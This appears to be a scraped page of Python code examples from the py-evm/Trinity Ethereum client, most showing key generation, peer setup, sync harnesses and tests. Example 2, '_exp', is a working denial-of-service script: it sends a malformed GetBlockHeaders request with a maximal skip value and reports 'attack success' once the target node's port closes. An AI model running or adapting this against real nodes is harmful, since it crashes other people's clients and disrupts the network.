Exemplo n.º 1
0
async def _setup_alice_and_bob_factories(alice_chain_db, bob_chain_db):
    cancel_token = CancelToken(
        'trinity.get_directly_linked_peers_without_handshake')

    #
    # Alice
    #
    alice_context = BeaconContext(
        chain_db=alice_chain_db,
        network_id=1,
    )

    alice_factory = BCCPeerFactory(
        privkey=ecies.generate_privkey(),
        context=alice_context,
        token=cancel_token,
    )

    #
    # Bob
    #
    bob_context = BeaconContext(
        chain_db=bob_chain_db,
        network_id=1,
    )

    bob_factory = BCCPeerFactory(
        privkey=ecies.generate_privkey(),
        context=bob_context,
        token=cancel_token,
    )

    return alice_factory, bob_factory
Exemplo n.º 2
0
def _exp(node_url, chain) -> None:

    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop

    ip, port = node_url.split('@')[1].split(':')
    if port_probe(ip, port):
        print('The port is open, starting to attack...')
    peer_class = LESPeer
    peer_pool = None
    if chain == 'mainnet':
        block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(MAINNET_GENESIS_HEADER)
        network_id = MainnetChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             MAINNET_VM_CONFIGURATION)
    elif chain == 'testnet':
        block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
        network_id = RopstenChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             ROPSTEN_VM_CONFIGURATION)
    loop = asyncio.get_event_loop()

    async def attack() -> None:
        nonlocal peer_pool
        nonlocal block_hash
        while not peer_pool.peers:
            print("Waiting for peer connection...")
            await asyncio.sleep(1)
        peer = cast(LESPeer, peer_pool.peers[0])
        cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset)
        data = {
            'request_id':
            1,
            'query':
            GetBlockHeadersQuery(decode_hex(block_hash), 1, 0xffffffffffffffff,
                                 False),
        }
        header, body = cmd.encode(data)
        peer.sub_proto.send(header, body)
        await asyncio.sleep(1)
        result = port_probe(ip, port)
        if not result:
            print('The port is closed,attack success ...')
            exit()

    t1 = asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    t2 = asyncio.ensure_future(attack())
    loop.set_debug(True)
    loop.run_until_complete(asyncio.wait([t1, t2]))
    loop.close()
Exemplo n.º 3
0
def test_encrypt_decrypt():
    msg = b'test yeah'
    privkey = ecies.generate_privkey()
    ciphertext = ecies.encrypt(msg, privkey.public_key)
    decrypted = ecies.decrypt(ciphertext, privkey)
    assert decrypted == msg

    privkey2 = ecies.generate_privkey()
    with pytest.raises(ecies.DecryptionError):
        decrypted = ecies.decrypt(ciphertext, privkey2)
Exemplo n.º 4
0
def test_encrypt_decrypt():
    msg = b'test yeah'
    privkey = ecies.generate_privkey()
    ciphertext = ecies.encrypt(msg, privkey.public_key)
    decrypted = ecies.decrypt(ciphertext, privkey)
    assert decrypted == msg

    privkey2 = ecies.generate_privkey()
    with pytest.raises(ecies.DecryptionError):
        decrypted = ecies.decrypt(ciphertext, privkey2)
Exemplo n.º 5
0
 def __init__(self, remote: kademlia.Node, privkey: datatypes.PrivateKey,
              use_eip8: bool, token: CancelToken) -> None:
     self.remote = remote
     self.privkey = privkey
     self.ephemeral_privkey = ecies.generate_privkey()
     self.use_eip8 = use_eip8
     self.cancel_token = token
Exemplo n.º 6
0
def initialize_data_dir(chain_config: ChainConfig) -> None:
    if not chain_config.data_dir.exists() and is_under_xdg_trinity_root(
            chain_config.data_dir):
        chain_config.data_dir.mkdir(parents=True, exist_ok=True)
    elif not chain_config.data_dir.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            "The base chain directory provided does not exist: `{0}`".format(
                chain_config.data_dir, ), chain_config.data_dir)

    # Logfile
    if (not chain_config.logdir_path.exists()
            and is_under_xdg_trinity_root(chain_config.logdir_path)):

        chain_config.logdir_path.mkdir(parents=True, exist_ok=True)
        chain_config.logfile_path.touch()
    elif not chain_config.logdir_path.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            "The base logging directory provided does not exist: `{0}`".format(
                chain_config.logdir_path, ), chain_config.logdir_path)

    # Chain data-dir
    os.makedirs(chain_config.database_dir, exist_ok=True)

    # Nodekey
    if chain_config.nodekey is None:
        nodekey = ecies.generate_privkey()
        with open(chain_config.nodekey_path, 'wb') as nodekey_file:
            nodekey_file.write(nodekey.to_bytes())
Exemplo n.º 7
0
def initialize_data_dir(trinity_config: TrinityConfig) -> None:
    should_create_data_dir = (not trinity_config.data_dir.exists()
                              and is_under_path(
                                  trinity_config.trinity_root_dir,
                                  trinity_config.data_dir))
    if should_create_data_dir:
        trinity_config.data_dir.mkdir(parents=True, exist_ok=True)
    elif not trinity_config.data_dir.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            f"The base chain directory provided does not exist: `{str(trinity_config.data_dir)}`",
            trinity_config.data_dir,
        )

    # Logfile
    should_create_logdir = (not trinity_config.logdir_path.exists()
                            and is_under_path(trinity_config.trinity_root_dir,
                                              trinity_config.logdir_path))
    if should_create_logdir:
        trinity_config.logdir_path.mkdir(parents=True, exist_ok=True)
        trinity_config.logfile_path.touch()
    elif not trinity_config.logdir_path.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            "The base logging directory provided does not exist: `{0}`".format(
                trinity_config.logdir_path, ), trinity_config.logdir_path)

    # Chain data-dir
    os.makedirs(trinity_config.database_dir, exist_ok=True)

    # Nodekey
    if trinity_config.nodekey is None:
        nodekey = ecies.generate_privkey()
        with open(trinity_config.nodekey_path, 'wb') as nodekey_file:
            nodekey_file.write(nodekey.to_bytes())
Exemplo n.º 8
0
def _test() -> None:
    import argparse
    import asyncio
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from p2p import ecies
    from p2p.kademlia import Node
    from trinity.protocol.common.constants import DEFAULT_PREFERRED_NODES
    from trinity.protocol.common.context import ChainContext
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()

    context = ChainContext(headerdb=chaindb,
                           network_id=network_id,
                           vm_configuration=ROPSTEN_VM_CONFIGURATION)
    peer_pool = ETHPeerPool(privkey=privkey, context=context)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    loop = asyncio.get_event_loop()

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
Exemplo n.º 9
0
def _test() -> None:
    import argparse
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncLevelDB, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    db = FakeAsyncLevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    network_id = RopstenChain.network_id
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    peer_pool = PeerPool(
        ETHPeer, chaindb, network_id, ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(chaindb, db, head.state_root, peer_pool)
    downloader.logger.setLevel(log_level)
    loop = asyncio.get_event_loop()

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    async def run() -> None:
        await downloader.run()
        downloader.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
Exemplo n.º 10
0
def _test():
    import argparse
    import asyncio
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.peer import ETHPeer, HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (FakeAsyncChainDB,
                                                    FakeAsyncRopstenChain,
                                                    LocalGethPeerPool)
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    privkey = ecies.generate_privkey()
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb,
                                      RopstenChain.network_id, privkey)
    else:
        discovery = None
        peer_pool = HardCodedNodesPeerPool(
            ETHPeer,
            chaindb,
            RopstenChain.network_id,
            privkey,
            discovery,
        )
    asyncio.ensure_future(peer_pool.run())

    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
Exemplo n.º 11
0
def _test() -> None:
    import argparse
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, LocalGethPeerPool

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.chain.ChainSyncer').setLevel(log_level)

    loop = asyncio.get_event_loop()
    # Use a ProcessPoolExecutor as the default because the tasks we want to offload from the main
    # thread are cpu intensive.
    loop.set_default_executor(ProcessPoolExecutor())
    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    privkey = ecies.generate_privkey()
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb,
                                      RopstenChain.network_id, privkey)
    else:
        from p2p.peer import HardCodedNodesPeerPool
        min_peers = 5
        peer_pool = HardCodedNodesPeerPool(ETHPeer, chaindb,
                                           RopstenChain.network_id, privkey,
                                           min_peers)

    asyncio.ensure_future(peer_pool.run())
    downloader = ChainSyncer(chaindb, peer_pool)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        try:
            await downloader.run()
        except OperationCancelled:
            pass
        await peer_pool.stop()
        await downloader.stop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)
    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 12
0
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p import kademlia
    from p2p.constants import ROPSTEN_BOOTNODES
    from p2p.discovery import DiscoveryProtocol
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, LocalGethPeerPool
    logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
    logging.getLogger('p2p.chain.ChainSyncer').setLevel(logging.DEBUG)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    loop = asyncio.get_event_loop()
    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    privkey = ecies.generate_privkey()
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb, RopstenChain.network_id, privkey)
        discovery = None
    else:
        listen_host = '0.0.0.0'
        listen_port = 30303
        addr = kademlia.Address(listen_host, listen_port, listen_port)
        discovery = DiscoveryProtocol(privkey, addr, ROPSTEN_BOOTNODES)
        loop.run_until_complete(discovery.create_endpoint())
        print("Bootstrapping discovery service...")
        loop.run_until_complete(discovery.bootstrap())
        peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id, privkey, discovery)

    asyncio.ensure_future(peer_pool.run())
    downloader = ChainSyncer(chaindb, peer_pool)
    # On ROPSTEN the discovery table is usually full of bad peers so we can't require too many
    # peers in order to sync.
    downloader.min_peers_to_sync = 1

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()
        if discovery is not None:
            discovery.stop()
            # Give any pending discovery tasks some time to finish.
            await asyncio.sleep(2)

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)
    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 13
0
def _test() -> None:
    import argparse
    import signal
    from p2p import constants
    from p2p import ecies

    loop = asyncio.get_event_loop()
    loop.set_debug(True)

    parser = argparse.ArgumentParser()
    parser.add_argument('-bootnode',
                        type=str,
                        help="The enode to use as bootnode")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.basicConfig(level=log_level,
                        format='%(asctime)s %(levelname)s: %(message)s')

    listen_host = '127.0.0.1'
    # Listen on a port other than 30303 so that we can test against a local geth instance
    # running on that port.
    listen_port = 30304
    privkey = ecies.generate_privkey()
    addr = kademlia.Address(listen_host, listen_port, listen_port)
    if args.bootnode:
        bootstrap_nodes = tuple([kademlia.Node.from_uri(args.bootnode)])
    else:
        bootstrap_nodes = tuple(
            kademlia.Node.from_uri(enode)
            for enode in constants.ROPSTEN_BOOTNODES)
    discovery = DiscoveryProtocol(privkey, addr, bootstrap_nodes)
    loop.run_until_complete(
        loop.create_datagram_endpoint(lambda: discovery,
                                      local_addr=('0.0.0.0', listen_port)))

    async def run() -> None:
        try:
            await discovery.bootstrap()
            while True:
                await discovery.lookup_random(CancelToken("Unused"))
                print("====================================================")
                print("Random nodes: ",
                      list(discovery.get_nodes_to_connect(10)))
                print("====================================================")
        except OperationCancelled:
            await discovery.stop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, discovery.cancel_token.trigger)

    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 14
0
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, LocalGethPeerPool
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')
    logging.getLogger('p2p.chain.ChainSyncer').setLevel(logging.DEBUG)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb,
                                      RopstenChain.network_id,
                                      ecies.generate_privkey())
    else:
        peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id,
                             ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    downloader = ChainSyncer(chaindb, peer_pool)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop = asyncio.get_event_loop()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)
    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 15
0
def _test():
    import argparse
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.peer import HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.state.StateDownloader').setLevel(log_level)

    db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    discovery = None
    peer_pool = HardCodedNodesPeerPool(ETHPeer,
                                       chaindb,
                                       RopstenChain.network_id,
                                       ecies.generate_privkey(),
                                       discovery,
                                       min_peers=5)
    asyncio.ensure_future(peer_pool.run())

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(db, head.state_root, peer_pool)
    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(downloader.run())
    loop.run_forever()
    loop.close()
Exemplo n.º 16
0
    def __init__(
            self, remote: NodeAPI, privkey: datatypes.PrivateKey, use_eip8: bool) -> None:
        if remote is None:
            raise ValidationError("Cannot create handshake with None remote")
        elif remote.address is None:
            raise ValidationError("Cannot create handshake with remote address=None")

        self.logger = get_logger("p2p.peer.Handshake")
        self.remote = remote
        self.privkey = privkey
        self.ephemeral_privkey = ecies.generate_privkey()
        self.use_eip8 = use_eip8
Exemplo n.º 17
0
def _resolve_node_key(trinity_config: TrinityConfig,
                      nodekey_seed: Optional[str]) -> PrivateKey:
    if nodekey_seed:
        private_key_bytes = hashlib.sha256(nodekey_seed.encode()).digest()
        nodekey = PrivateKey(private_key_bytes)
        trinity_config.nodekey = nodekey
        return

    if trinity_config.nodekey is None:
        nodekey = ecies.generate_privkey()
        with open(trinity_config.nodekey_path, 'wb') as nodekey_file:
            nodekey_file.write(nodekey.to_bytes())
        trinity_config.nodekey = nodekey
Exemplo n.º 18
0
    def __init__(self, remote: NodeAPI, privkey: datatypes.PrivateKey,
                 use_eip8: bool, token: CancelToken) -> None:
        if remote is None:
            raise ValidationError("Cannot create handshake with None remote")
        elif remote.address is None:
            raise ValidationError(
                "Cannot create handshake with remote address=None")

        self.remote = remote
        self.privkey = privkey
        self.ephemeral_privkey = ecies.generate_privkey()
        self.use_eip8 = use_eip8
        self.cancel_token = token
Exemplo n.º 19
0
def _test():
    import argparse
    import asyncio
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import ETHPeer, DEFAULT_PREFERRED_NODES
    from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(ETHPeer, chaindb, network_id, privkey, ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
Exemplo n.º 20
0
def _test():
    import argparse
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.peer import HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.state.StateDownloader').setLevel(log_level)

    db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    peer_pool = HardCodedNodesPeerPool(ETHPeer,
                                       chaindb,
                                       RopstenChain.network_id,
                                       ecies.generate_privkey(),
                                       min_peers=5)
    asyncio.ensure_future(peer_pool.run())

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(db, head.state_root, peer_pool)
    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        try:
            await downloader.run()
        except OperationCancelled:
            pass
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 21
0
async def get_directly_linked_peers_without_handshake(
        alice_factory: BasePeerFactory = None,
        bob_factory: BasePeerFactory = None) -> Tuple[BasePeer, BasePeer]:
    """
    See get_directly_linked_peers().

    Neither the P2P handshake nor the sub-protocol handshake will be performed here.
    """
    cancel_token = CancelToken("get_directly_linked_peers_without_handshake")

    if alice_factory is None:
        alice_factory = ParagonPeerFactory(
            privkey=ecies.generate_privkey(),
            context=ParagonContext(),
            token=cancel_token,
        )

    if bob_factory is None:
        bob_factory = ParagonPeerFactory(
            privkey=ecies.generate_privkey(),
            context=ParagonContext(),
            token=cancel_token,
        )

    alice_remote = NodeFactory(pubkey=alice_factory.privkey.public_key)
    bob_remote = NodeFactory(pubkey=bob_factory.privkey.public_key)

    alice_transport, bob_transport = MemoryTransportPairFactory(
        alice_remote=alice_remote,
        alice_private_key=alice_factory.privkey,
        bob_remote=bob_remote,
        bob_private_key=bob_factory.privkey,
    )

    alice = alice_factory.create_peer(alice_transport)
    bob = bob_factory.create_peer(bob_transport)

    return alice, bob
Exemplo n.º 22
0
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, connect_to_peers_loop
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.state.StateDownloader').setLevel(log_level)

    db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    network_id = RopstenChain.network_id
    nodes = DEFAULT_PREFERRED_NODES[network_id]
    peer_pool = PeerPool(ETHPeer, chaindb, network_id,
                         ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(db, head.state_root, peer_pool)
    loop = asyncio.get_event_loop()

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(downloader.run())
    loop.run_forever()
    loop.close()
Exemplo n.º 23
0
def initialize_data_dir(trinity_config: TrinityConfig) -> None:
    should_create_data_dir = (
        not trinity_config.data_dir.exists() and
        is_under_path(trinity_config.trinity_root_dir, trinity_config.data_dir)
    )
    if should_create_data_dir:
        trinity_config.data_dir.mkdir(parents=True, exist_ok=True)
    elif not trinity_config.data_dir.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            f"The base chain directory provided does not exist: `{str(trinity_config.data_dir)}`",
            trinity_config.data_dir,
        )

    # Logfile
    should_create_logdir = (
        not trinity_config.log_dir.exists() and
        (
            # If we're in the default path, always create the log directory
            is_under_path(trinity_config.trinity_root_dir, trinity_config.log_dir) or
            (
                # If we're in a custom path, create the log directory if the data dir is empty
                is_under_path(trinity_config.data_dir, trinity_config.log_dir) and
                not any(trinity_config.data_dir.iterdir())
            )
        )
    )
    if should_create_logdir:
        trinity_config.log_dir.mkdir(parents=True, exist_ok=True)
        trinity_config.logfile_path.touch()
    elif not trinity_config.log_dir.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            "The base logging directory provided does not exist: `{0}`".format(
                trinity_config.log_dir,
            ),
            trinity_config.log_dir,
        )

    # Initialize chain, pid, ipc and enrdb directories
    os.makedirs(trinity_config.pid_dir, exist_ok=True)
    os.makedirs(trinity_config.ipc_dir, exist_ok=True)
    os.makedirs(trinity_config.node_db_dir, exist_ok=True)

    # Nodekey
    if trinity_config.nodekey is None:
        nodekey = ecies.generate_privkey()
        with open(trinity_config.nodekey_path, 'wb') as nodekey_file:
            nodekey_file.write(nodekey.to_bytes())
Exemplo n.º 24
0
def initialize_data_dir(chain_config: ChainConfig) -> None:
    if is_under_xdg_trinity_root(chain_config.data_dir):
        os.makedirs(chain_config.data_dir, exist_ok=True)
    elif not os.path.exists(chain_config.data_dir):
        # we don't lazily create the base dir for non-default base directories.
        raise ValueError(
            "The base chain directory provided does not exist: `{0}`".format(
                chain_config.data_dir, ))

    # Chain data-dir
    os.makedirs(chain_config.database_dir, exist_ok=True)

    # Nodekey
    if chain_config.nodekey is None:
        nodekey = ecies.generate_privkey()
        with open(chain_config.nodekey_path, 'wb') as nodekey_file:
            nodekey_file.write(nodekey.to_bytes())
Exemplo n.º 25
0
def _test():
    import signal
    from p2p import constants
    from p2p import ecies
    from p2p.exceptions import OperationCancelled

    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')

    loop = asyncio.get_event_loop()
    loop.set_debug(True)

    listen_host = '0.0.0.0'
    # Listen on a port other than 30303 in case we want to test against a local geth instance
    # running on that port.
    listen_port = 30303
